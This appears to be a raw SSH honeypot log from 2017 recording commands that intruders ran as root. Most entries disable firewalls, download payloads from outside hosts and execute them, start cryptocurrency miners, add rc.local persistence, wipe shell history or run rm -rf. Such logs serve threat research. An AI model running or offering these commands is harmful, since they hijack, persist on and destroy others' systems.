From 111.73.45.188 2-Jan-2017 05:33:51 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://111.73.45.188:9876/pzz;chmod 777 pzz;./pzz; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop wget -c http://111.73.45.188:9876/pzz chmod 777 pzz ./pzz From 42.59.189.121 4-Jan-2017 15:47:49 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://111.67.192.105:3333/ssssyn;chmod 777 ssssyn;./ssssyn; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop wget -c http://111.67.192.105:3333/ssssyn chmod 777 ssssyn ./ssssyn From 94.97.86.201 11-Jan-2017 17:15:07 ssh2 root Exec unset plm; plm=`ps x |grep stratum|grep -v grep| cut -d 's' -f 2`; if [ -e $plm ] ; then mkdir /var/tmp/.war;wget http://95.128.182.166/javascripts/minerd -O /var/tmp/.war/1;curl -o /var/tmp/.war/1 http://95.128.182.166/javascripts/minerd;chmod +x /var/tmp/.war/1 ; (exec /var/tmp/.war/1 -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u zaxa2aq@protonmail.com -p x &> /dev/null &);wget http://95.128.182.166/javascripts/4 -O /var/tmp/.war/4;curl -o /var/tmp/.war/4 http://95.128.182.166/javascripts/4;chmod +x /var/tmp/.war/4; cp /var/tmp/.war/4 /var/tmp/.war/6;(exec /var/tmp/.war/4 &> /dev/null &) ; (while [ 1 ]; do killall 4; killall 5 ; cp /var/tmp/.war/6 /var/tmp/.war/5;chmod +x /var/tmp/.war/5;(exec /var/tmp/.war/5 &> /dev/null &); sleep 3600 ;done &) ; else echo; fi; unset plm plm=`ps x |grep stratum|grep -v grep| cut -d if [ -e $plm ] then mkdir /var/tmp/.war wget http://95.128.182.166/javascripts/minerd -O /var/tmp/.war/1 curl -o /var/tmp/.war/1 http://95.128.182.166/javascripts/minerd chmod +x /var/tmp/.war/1 (exec /var/tmp/.war/1 -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u zaxa2aq@protonmail.com wget http://95.128.182.166/javascripts/4 -O /var/tmp/.war/4 curl -o /var/tmp/.war/4 http://95.128.182.166/javascripts/4 chmod +x /var/tmp/.war/4 cp /var/tmp/.war/4 /var/tmp/.war/6 (exec /var/tmp/.war/4 &> /dev/null &) (while [ 1 ] do killall 4 killall 5 cp /var/tmp/.war/6 /var/tmp/.war/5 chmod +x /var/tmp/.war/5 (exec /var/tmp/.war/5 &> /dev/null &) sleep 3600 done &) else echo fi From 222.186.58.182 17-Jan-2017 07:47:41 ssh2 root Exec wget -O /tmp/hdvr http://118.184.48.90:7361/hdvr wget -O /tmp/hdvr http://118.184.48.90:7361/hdvr From 118.193.228.226 21-Jan-2017 15:17:21 ssh2 root uname -a From 221.194.44.219 25-Jan-2017 02:05:05 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /tmp;wget -c http://221.194.44.219:7791/poiu;chmod 777 poiu;./poiu;echo "cd /tmp/">>/etc/rc.local;echo "./poiu&">>/etc/rc.local;echo "/etc/init.d/iptables stop">>/etc/rc.local; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop cd /tmp wget -c http://221.194.44.219:7791/poiu chmod 777 poiu ./poiu echo "cd /tmp/">>/etc/rc.local echo "./poiu&">>/etc/rc.local echo "/etc/init.d/iptables stop">>/etc/rc.local From 123.249.35.42 25-Jan-2017 22:47:01 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /tmp;wget -c http://123.249.35.42:11122/Sym50.ssz;chmod 777 Sym50.ssz;./Sym50.ssz;echo "cd /tmp/">>/etc/rc.local;echo "./Sym50.ssz&">>/etc/rc.local;echo "/etc/init.d/iptables stop">>/etc/rc.local; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop cd /tmp wget -c http://123.249.35.42:11122/Sym50.ssz chmod 777 Sym50.ssz ./Sym50.ssz echo "cd /tmp/">>/etc/rc.local echo "./Sym50.ssz&">>/etc/rc.local echo "/etc/init.d/iptables stop">>/etc/rc.local From 119.117.236.148 29-Jan-2017 21:28:05 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://119.188.247.73:3322/ssssyn;chmod 777 ssssyn;./ssssyn; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop wget -c http://119.188.247.73:3322/ssssyn chmod 777 ssssyn ./ssssyn From 117.179.164.9 1-Feb-2017 10:01:31 ssh2 root uname -a whoami From 103.79.141.29 1-Feb-2017 20:22:29 ssh2 root uname -a service iptables stop wget http://115.159.5.86:6606/google wget -O http://115.159.5.86:6606/google wget -c exit From 211.97.129.228 7-Feb-2017 00:34:05 ssh2 root uname -a ps -ef rm -rf /etc/crontab find ./ -name "S90*" | passwd From 211.97.131.161 7-Feb-2017 21:16:01 ssh2 root uname -a ps -ef rm -rf /etc/crontab find ./ -name "S90*" | passwd dfkdsjgldfkgdkgkshgshgwwwxxxaqqq From 123.188.129.80 8-Feb-2017 01:16:05 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://103.26.78.88:8080/SYN250;chmod 777 SYN250;./SYN250; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop wget -c http://103.26.78.88:8080/SYN250 chmod 777 SYN250 ./SYN250 From 211.97.131.225 10-Feb-2017 21:42:47 ssh2 root passwd ps -ef From 211.97.131.225 11-Feb-2017 08:03:45 ssh2 root uname - uname -a ps -ef passwd From 125.211.202.186 12-Feb-2017 15:06:39 ssh2 root Exec /tmp/ss.exe upgrade /tmp/ss.exe upgrade From 42.87.19.244 12-Feb-2017 22:29:41 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://www.ksddos.com:8787/SYN25000;chmod 777 SYN25000;./SYN25000; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop wget -c http://www.ksddos.com:8787/SYN25000 chmod 777 SYN25000 ./SYN25000 From 125.211.202.186 13-Feb-2017 11:48:35 ssh2 root Exec chmod 0777 /tmp/ss.exe chmod 0777 /tmp/ss.exe From 125.211.202.186 13-Feb-2017 22:09:33 ssh2 root Exec /tmp/ss.exe /tmp/ss.exe From 125.211.202.186 14-Feb-2017 08:30:31 ssh2 root Exec rm -rf /tmp/ss.exe* rm -rf /tmp/ss.exe* From 125.211.202.186 15-Feb-2017 05:12:27 ssh2 root Exec chmod 0777 /tmp/t0.5 chmod 0777 /tmp/t0.5 From 125.211.202.186 16-Feb-2017 22:36:19 ssh2 root Exec chmod 0777 /tmp/t0.5 chmod 0777 /tmp/t0.5 From 1.85.118.181 17-Feb-2017 00:11:01 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://www.ksddos.com:7777/8uc;chmod 777 8uc;./8uc; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop wget -c http://www.ksddos.com:7777/8uc chmod 777 8uc ./8uc From 125.211.202.186 17-Feb-2017 08:57:17 ssh2 root Exec /tmp/t0.5 /tmp/t0.5 From 1.85.118.181 17-Feb-2017 09:57:09 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://43.240.0.118:521/max64;chmod 777 max64;./max64; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop wget -c http://43.240.0.118:521/max64 chmod 777 max64 ./max64 From 1.85.118.181 17-Feb-2017 14:50:13 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://www.ksddos.com:7777/syn777;chmod 777 syn777;./syn777; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop wget -c http://www.ksddos.com:7777/syn777 chmod 777 syn777 ./syn777 From 125.211.202.186 17-Feb-2017 19:18:15 ssh2 root Exec rm -rf /tmp/t0.5 rm -rf /tmp/t0.5 From 1.85.118.181 17-Feb-2017 19:43:17 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://www.ksddos.com:7777/syn789;chmod 777 syn789;./syn789; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop wget -c http://www.ksddos.com:7777/syn789 chmod 777 syn789 ./syn789 From 1.85.118.181 18-Feb-2017 00:36:21 ssh2 root Exec wget http://103.26.78.88:8080/syn789;chmod 777 syn789;./syn789 wget http://103.26.78.88:8080/syn789 chmod 777 syn789 ./syn789 From 104.236.224.5 18-Feb-2017 20:08:37 ssh2 root Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://104.236.224.5/8UsA.sh; curl -O http://104.236.224.5/8UsA.sh; chmod 777 8UsA.sh; sh 8UsA.sh; tftp 104.236.224.5 -c get t8UsA.sh; chmod 777 t8UsA.sh; sh t8UsA.sh; tftp -r t8UsA2.sh -g 104.236.224.5; chmod 777 t8UsA2.sh; sh t8UsA2.sh; ftpget -v -u anonymous -p anonymous -P 21 104.236.224.5 8UsA1.sh 8UsA1.sh; sh 8UsA1.sh; rm -rf 8UsA.sh t8UsA.sh t8UsA2.sh 8UsA1.sh; rm -rf * cd /tmp || cd /var/run || cd /mnt wget http://104.236.224.5/8UsA.sh curl -O http://104.236.224.5/8UsA.sh chmod 777 8UsA.sh sh 8UsA.sh tftp 104.236.224.5 -c get t8UsA.sh chmod 777 t8UsA.sh sh t8UsA.sh tftp -r t8UsA2.sh -g 104.236.224.5 chmod 777 t8UsA2.sh sh t8UsA2.sh ftpget -v -u anonymous -p anonymous -P 21 sh 8UsA1.sh rm -rf 8UsA.sh t8UsA.sh t8UsA2.sh 8UsA1.sh rm -rf * From 211.97.131.202 21-Feb-2017 06:05:59 ssh2 root uname -a ps -ef passwd From 211.97.128.214 22-Feb-2017 13:08:53 ssh2 root uname -a ps -ef From 42.57.144.208 23-Feb-2017 02:43:01 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://119.188.247.73:22334/ssssyn;chmod 777 ssssyn;./ssssyn; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop wget -c http://119.188.247.73:22334/ssssyn chmod 777 ssssyn ./ssssyn From 119.117.238.37 23-Feb-2017 17:22:13 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://119.188.247.73/Linux-syn25;chmod 777 Linux-syn25;./Linux-syn25; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop wget -c http://119.188.247.73/Linux-syn25 chmod 777 Linux-syn25 ./Linux-syn25 From 119.249.54.93 1-Mar-2017 10:44:21 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /tmp;wget -c http://221.194.44.219:7791/poiu;chmod 777 poiu;./poiu;chattr +i /tmp/poiu;echo "cd /tmp/">>/etc/rc.local;echo "./poiu&">>/etc/rc.local;echo "/etc/init.d/iptables stop">>/etc/rc.local; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop cd /tmp wget -c http://221.194.44.219:7791/poiu chmod 777 poiu ./poiu chattr +i /tmp/poiu echo "cd /tmp/">>/etc/rc.local echo "./poiu&">>/etc/rc.local echo "/etc/init.d/iptables stop">>/etc/rc.local From 111.73.45.39 1-Mar-2017 21:05:19 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://111.73.45.39:9876/paa;chmod 777 paa;./paa; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop wget -c http://111.73.45.39:9876/paa chmod 777 paa ./paa From 42.177.174.108 7-Mar-2017 17:33:09 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://119.188.247.73:22334/Linux-syn25;chmod 777 Linux-syn25;./Linux-syn25; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop wget -c http://119.188.247.73:22334/Linux-syn25 chmod 777 Linux-syn25 ./Linux-syn25 From 111.73.46.27 13-Mar-2017 12:31:25 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://111.73.45.39:8896/pqq;chmod 777 pqq;./pqq; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop wget -c http://111.73.45.39:8896/pqq chmod 777 pqq ./pqq From 125.211.202.186 26-Mar-2017 12:00:25 ssh2 root Exec chmod 0777 /tmp/s2 chmod 0777 /tmp/s2 From 125.211.202.186 26-Mar-2017 22:21:23 ssh2 root Exec /tmp/s2 upgrade /tmp/s2 upgrade From 125.211.202.186 27-Mar-2017 08:42:21 ssh2 root Exec rm -rf /tmp/s2 rm -rf /tmp/s2 From 125.211.202.186 27-Mar-2017 19:03:19 ssh2 root Exec scp -t -- /tmp/ scp -t -- /tmp/ From 125.211.202.186 28-Mar-2017 05:24:17 ssh2 root Exec chmod 0777 /tmp/x0.7 chmod 0777 /tmp/x0.7 From 125.211.202.186 28-Mar-2017 15:45:15 ssh2 root Exec /tmp/x0.7 /tmp/x0.7 From 125.211.202.186 29-Mar-2017 02:06:13 ssh2 root Exec rm -rf /tmp/x0.7 rm -rf /tmp/x0.7 From 112.4.175.80 31-Mar-2017 05:51:03 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://103.214.171.198:5198/zsyy;chmod 777 zsyy;./zsyy; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop wget -c http://103.214.171.198:5198/zsyy chmod 777 zsyy ./zsyy From 45.125.17.19 13-Apr-2017 04:20:03 ssh2 root ps -ef w top From 104.238.127.81 12-May-2017 12:05:47 ssh2 root Exec curl -fsSL http://218.248.40.228:8443/i.sh | sh curl -fsSL http://218.248.40.228:8443/i.sh | sh From 141.105.66.143 18-May-2017 23:20:17 ssh2 root Exec uname uname From 45.76.145.216 21-May-2017 03:05:07 ssh2 root Exec cat /proc/cpuinfo| grep 'cpu cores'| uniq | awk '{print $4}' cat /proc/cpuinfo| grep 'cpu cores'| uniq | awk From 173.236.29.90 30-May-2017 04:25:25 ssh2 root Exec cd /tmp; ps -ef | grep sfs | grep -v grep | awk '{print $2}' | xargs kill -9;ps -ef | grep sfs | grep -v grep | awk '{print $2}' | xargs kill -9; ulimit -n 150000; wget -O sfs http://185.174.172.18/sfs;chmod 777 sfs;./sfs -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u richard.melony@openmailbox.org -p x >/dev/null 2>&1 &; ps -ef | grep rrr | grep -v grep | awk '{print $2}' | xargs kill -9;ps -ef | grep rrr | grep -v grep | awk '{print $2}' | xargs kill -9 cd /tmp ps -ef | grep sfs | grep -v ulimit -n 150000 wget -O sfs http://185.174.172.18/sfs chmod 777 sfs ./sfs -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u richard.melony@openmailbox.org -p ps -ef | grep rrr | grep -v From 159.65.184.238 9-Jul-2017 17:10:45 ssh2 root Exec cat /etc/issue cat /etc/issue From 5.39.94.66 10-Jul-2017 03:37:15 ssh2 root Exec top -v | grep ver top -v | grep ver From 119.188.247.73 12-Jul-2017 18:26:45 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://119.188.247.73:3333/linux9.0;chmod 777 linux9.0;./linux9.0; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop wget -c http://119.188.247.73:3333/linux9.0 chmod 777 linux9.0 ./linux9.0 From 51.140.72.37 21-Jul-2017 19:03:21 ssh2 root Exec uname-a uname-a From 94.23.90.12 22-Jul-2017 03:07:49 ssh2 root Exec uname -n -s -r -v;wget -q xkobe.000webhostapp.com/pula;perl pula;rm -rf pula;history -c uname -n -s -r -v wget -q xkobe.000webhostapp.com/pula perl pula rm -rf pula history -c From 122.93.235.10 24-Jul-2017 19:30:07 ssh2 root wget -O /tmp/javas.log http://122.93.235.10:5198/javas.log srtp -O /tmp/javas.log http://122.93.235.10:5198/javas.log rm -f javas.log.3 rm -f javas.log.4 rm -f javas.log.5 mv /usr/bin/wget /usr/bin/srtp mv /usr/bin/curl From 116.31.119.26 10-Aug-2017 11:09:09 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /etc;yum install -y wget;wget -c http:/116.31.119.26:80/httpsd;chmod 777 httpsd;./httpsd; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop cd /etc yum install -y wget wget -c http:/116.31.119.26:80/httpsd chmod 777 httpsd ./httpsd From 146.185.239.17 14-Aug-2017 04:26:19 ssh2 root w /sbin/ifconfig gcc uname -a cat /proc/cpuinfo exit From 146.185.239.17 14-Aug-2017 17:43:33 ssh2 root w uname /sbin/ifconfig gcc uname -a cat /proc/cpuinfo exit From 1.83.30.115 17-Aug-2017 23:52:37 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /etc;yum install -y wget;wget -c http://116.31.119.26:8080/httpsd;chmod 777 httpsd;./httpsd; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop cd /etc yum install -y wget wget -c http://116.31.119.26:8080/httpsd chmod 777 httpsd ./httpsd From 116.31.119.26 18-Aug-2017 04:45:41 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /etc;yum install -y wget;wget -c http:/116.31.119.26:8080/httpsd;chmod 777 httpsd;./httpsd; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop cd /etc yum install -y wget wget -c http:/116.31.119.26:8080/httpsd chmod 777 httpsd ./httpsd From 116.31.119.26 18-Aug-2017 09:38:45 ssh2 root Exec /etc/init.d/iptables stop; /etc/init.d/iptables stop From 116.31.119.26 18-Aug-2017 14:31:49 ssh2 root Exec service iptables stop service iptables stop From 116.31.119.26 18-Aug-2017 19:24:53 ssh2 root Exec SuSEfirewall2 stop SuSEfirewall2 stop From 116.31.119.26 19-Aug-2017 00:17:57 ssh2 root Exec reSuSEfirewall2 stop reSuSEfirewall2 stop From 116.31.119.26 19-Aug-2017 05:11:01 ssh2 root Exec cd /etc cd /etc From 116.31.119.26 19-Aug-2017 10:04:05 ssh2 root Exec yum install -y wget yum install -y wget From 116.31.119.26 19-Aug-2017 19:50:13 ssh2 root Exec wget -c http://116.31.119.26:8080/httpsd wget -c http://116.31.119.26:8080/httpsd From 116.31.119.26 20-Aug-2017 00:43:17 ssh2 root Exec chmod 777 httpsd chmod 777 httpsd From 116.31.119.26 20-Aug-2017 15:22:29 ssh2 root Exec ./httpsd ./httpsd From 116.31.119.26 21-Aug-2017 01:08:37 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /etc;yum install -y wget;wget -c http://116.31.119.26:80/httpsd;chmod 777 httpsd;./httpsd; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop cd /etc yum install -y wget wget -c http://116.31.119.26:80/httpsd chmod 777 httpsd ./httpsd From 116.31.119.26 21-Aug-2017 10:54:45 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /etc;yum install -y wget;wget -c http://116.31.119.26:80/httpsd;chmod 755 httpsd;./httpsd; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop cd /etc yum install -y wget wget -c http://116.31.119.26:80/httpsd chmod 755 httpsd ./httpsd From 104.171.170.221 7-Sep-2017 08:19:17 ssh2 root ls cd /tmp From 117.3.205.108 7-Sep-2017 13:12:21 ssh2 root jos From 113.181.117.14 7-Sep-2017 18:05:25 ssh2 root histoprry From 193.201.224.206 7-Sep-2017 22:58:29 ssh2 root histroy cwget wget ps aux uname -a cat /etc/issue rm rm -rf /* From 185.58.193.149 25-Oct-2017 04:09:57 ssh2 root Exec wget http://31.14.133.104/botz.sh; chmod +x *; bash botz.sh;wget http://31.14.133.104/root-1234 wget http://31.14.133.104/botz.sh chmod +x * bash botz.sh wget http://31.14.133.104/root-1234 From 124.237.7.23 4-Nov-2017 20:01:09 ssh2 root Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.165.29.196/lmao.sh; curl -O http://185.165.29.196/lmao.sh; chmod 777 lmao.sh; sh lmao.sh; tftp 185.165.29.196 -c get lol.sh; chmod 777 lol.sh; sh lol.sh; tftp -r lol1.sh -g 185.165.29.196; chmod 777 lol1.sh; sh lol1.sh; ftpget -v -u anonymous -p anonymous -P 21 185.165.29.196 ftp1.sh ftp1.sh; sh ftp1.sh; rm -rf * cd /tmp || cd /var/run || cd /mnt wget http://185.165.29.196/lmao.sh curl -O http://185.165.29.196/lmao.sh chmod 777 lmao.sh sh lmao.sh tftp 185.165.29.196 -c get lol.sh chmod 777 lol.sh sh lol.sh tftp -r lol1.sh -g 185.165.29.196 chmod 777 lol1.sh sh lol1.sh ftpget -v -u anonymous -p anonymous -P 21 sh ftp1.sh rm -rf * From 46.243.189.111 5-Nov-2017 06:22:07 ssh2 root Exec cd /var/tmp; wget http://185.165.29.196/lmao.sh; curl -O http://185.165.29.196/lmao.sh; chmod 777 lmao.sh; sh lmao.sh; busybox tftp 185.165.29.196 -c get lol.sh; chmod 777 lol.sh; sh lol.sh;busybox tftp -r lol1.sh -g 185.165.29.196; chmod 777 lol1.sh; sh lol1.sh; ftpget -v -u anonymous -p anonymous -P 21 185.165.29.196 ftp1.sh ftp1.sh; sh ftp1.sh; rm -rf * cd /var/tmp wget http://185.165.29.196/lmao.sh curl -O http://185.165.29.196/lmao.sh chmod 777 lmao.sh sh lmao.sh busybox tftp 185.165.29.196 -c get lol.sh chmod 777 lol.sh sh lol.sh busybox tftp -r lol1.sh -g 185.165.29.196 chmod 777 lol1.sh sh lol1.sh ftpget -v -u anonymous -p anonymous -P 21 sh ftp1.sh rm -rf * From 51.15.193.245 9-Nov-2017 03:30:49 ssh2 root Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://82.202.235.22/8UsA.sh; curl -O http://82.202.235.22/8UsA.sh; chmod 777 8UsA.sh; sh 8UsA.sh; tftp 82.202.235.22 -c get t8UsA.sh; chmod 777 t8UsA.sh; sh t8UsA.sh; tftp -r t8UsA2.sh -g 82.202.235.22; chmod 777 t8UsA2.sh; sh t8UsA2.sh; ftpget -v -u anonymous -p anonymous -P 21 82.202.235.22 8UsA1.sh 8UsA1.sh; sh 8UsA1.sh; rm -rf 8UsA.sh t8UsA.sh t8UsA2.sh 8UsA1.sh; rm -rf * cd /tmp || cd /var/run || cd /mnt wget http://82.202.235.22/8UsA.sh curl -O http://82.202.235.22/8UsA.sh chmod 777 8UsA.sh sh 8UsA.sh tftp 82.202.235.22 -c get t8UsA.sh chmod 777 t8UsA.sh sh t8UsA.sh tftp -r t8UsA2.sh -g 82.202.235.22 chmod 777 t8UsA2.sh sh t8UsA2.sh ftpget -v -u anonymous -p anonymous -P 21 sh 8UsA1.sh rm -rf 8UsA.sh t8UsA.sh t8UsA2.sh 8UsA1.sh rm -rf * From 94.177.161.150 15-Nov-2017 04:24:21 ssh2 root Exec uname -a && echo RAM: && free -mt && echo && echo && echo Procesoare: && grep -c ^processor /proc/cpuinfo && echo && echo UPTIME: && uptime uname -a && echo RAM: && free -mt From 207.148.99.179 29-Nov-2017 20:17:13 ssh2 root Exec rm -f /tmp/run;if [ `getconf LONG_BIT` -eq 64 ];then u="http://www.bizqsoft.com/tp2/r6.log";else u="http://www.bizqsoft.com/tp2/r.log";fi;(wget -q -O /tmp/run $u || curl -fsSL -o /tmp/run $u || python -c "import urllib;urllib.urlretrieve('$u','/tmp/run')");chmod 0777 /tmp/run && /tmp/run;rm -rf /tmp/run;echo > ~/.bash_history rm -f /tmp/run if [ `getconf LONG_BIT` -eq 64 ] then u="http://www.bizqsoft.com/tp2/r6.log" else u="http://www.bizqsoft.com/tp2/r.log" fi (wget -q -O /tmp/run $u || curl -fsSL urllib.urlretrieve('$u','/tmp/run')") chmod 0777 /tmp/run && /tmp/run rm -rf /tmp/run echo > ~/.bash_history From 119.188.247.73 15-Dec-2017 00:16:37 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://119.188.247.73:5858/TTTUS2;chmod 777 TTTUS2;./TTTUS2; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop wget -c http://119.188.247.73:5858/TTTUS2 chmod 777 TTTUS2 ./TTTUS2 From 46.243.189.111 20-Dec-2017 23:24:35 ssh2 root Exec cd /tmp; wget http://46.243.189.109/w || curl -O http://46.243.189.109/w; chmod 777 w; sh w; rm -rf w; tftp 46.243.189.109 -c get alexis.sh; chmod 777 alexis.sh; sh alexis.sh; tftp -r Word.sh -g 46.243.189.109; chmod 777 Word.sh; sh Word.sh;rm -rf alexis.sh Word.sh cd /tmp wget http://46.243.189.109/w || curl -O http://46.243.189.109/w chmod 777 w sh w rm -rf w tftp 46.243.189.109 -c get alexis.sh chmod 777 alexis.sh sh alexis.sh tftp -r Word.sh -g 46.243.189.109 chmod 777 Word.sh sh Word.sh rm -rf alexis.sh Word.sh